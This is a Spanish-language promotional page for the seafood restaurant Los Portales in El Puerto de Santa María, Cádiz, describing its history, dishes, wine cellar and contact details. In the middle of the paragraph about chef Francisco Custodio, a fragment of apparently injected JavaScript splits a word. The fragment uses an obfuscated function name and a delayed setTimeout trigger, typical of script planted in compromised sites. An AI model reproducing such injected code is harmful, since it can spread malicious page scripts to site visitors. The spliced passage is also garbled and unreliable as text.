Restaurante Los Portales

lomo-de-rape-de-costa-al-estilo-marinero-960x600Restaurante “Los Portales” fundado en Julio de 1977. Situado en el casco antiguo de la ciudad, en una zona típicamente marinera como es la Ribera del Marisco junto al río Guadalete.
El Puerto de Santa María (Cádiz), es un bello rincón del sur de Europa, eminentemente turístico, marítimo y marinero, lleno de luz (con más de 3000 horas de sol al año) y alegría a rebosar, que posee, en cuanto a su clima, unas especiales peculiaridades que hacen de este municipio la tierra del Vino Fino por excelencia.Situada en uno de los tres vértices que constituyen el denominado marco del Jerez-Xérès-Sherry, junto con Sanlúcar de Barrameda y Jerez de la Frontera, es el sitio ideal para la crianza de sus magníficos caldos: el Vino Fino, aunque no desdeña elaborar otros productos en sus afamadas bodegas.

lomo-de-lenguado-con-fideos-salteados-con-langostinos-960x600En El Puerto, en el corazón de la Bahía de Cádiz, extendida como un manto a la margen derecha del río Guadalete, tienen su encuentro la tierra, el aire y el mar. Aquí tiene su privilegiado lugar el Restaurante Los Portales, un establecimiento señero en la gastronomía portuense, tanto por el tipo de cocina que elaboramos, como por la calidad de nuestros productos. Ubicado en la Ribera del Marisco, es recomendado por las guías más prestigiosas de gastronomía.Desde hace más de 25 años,Francisco Custodio Cárdenas viene apostandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando por la gastronomía propia de la Bahía de Cádiz, basada en mariscos y frutos de la mar, y los guisos de nuestra cocina, desde los más elementales a los más elaborados.Su fórmula, a la que no renuncia habida cuenta del reconocimiento del que goza elRestaurante Los Portales, es fácil aunque no todo el mundo sabe aplicarla en su justa medida: buena calidad de los productos, inmejorable trato al cliente, y una aceptable relación entre la calidad y el precio.La cocina de Paco Custodio, está basada fundamentalmente en los productos de la bahía gaditana. Pescados tan típicos y deliciosos como son la urta, lubina, dorada, acedías, calamares, o mariscos como gambas blancas, langostinos, bogavantes, cigalas o almejas, entre otros, no faltan en sus vitrinas expuestas al público.La cocina del Restaurante Los Portales, muy acreditada, está basada fundamentalmente en los productos de la bahía gaditana. Pescados tan típicos y deliciosos de estos pagos como son urta, lubina, dorada, acedías, calamares, o mariscos como gambas blancas, langostinos, bogavantes, cigalas o almejas, entre otros, no faltan en el repleto expositor que hay, de manera visible, en este restaurante para que nuestros clientes elijan los pescados o mariscos que deseen tomar, totalmente frescos y recién pescados.Entre las distintas especialidades podemos encontrar la parrillada de pescados y mariscos; lenguado a la crema de langosta; almejas a los portales, hecha a base de un refrito de ajo, con perejil y unos taquitos de jamón ibérico regado con buen vino fino de la tierra; perdiz al estilo de la casa o bogavantes de costas.La repostería es eminentemente casera, como el típico tocinillo de cielo, mousses variados, tarta de mil hojas; y la tarta de limón con soufles y sorbete, entre otros tantos dulces y especialidades.La bodega ofrece una selección variada de las mejores cosechas nacionales, dedicándole especial interés a los vinos del Marco de Jerez- Xerez-Sherry, único en el mundo, capaz de satisfacer los paladares más exigentes.
RESTAURANTE LOS PORTALES
Calle Ribera del Marisco, 7
11500 – El Puerto de Santa MaríaCádiz – EspañaTel.: 956 542 116/ 956 541 812 Fax: 956 541 340Email: restaurante@losportales.comw ww.losportales.com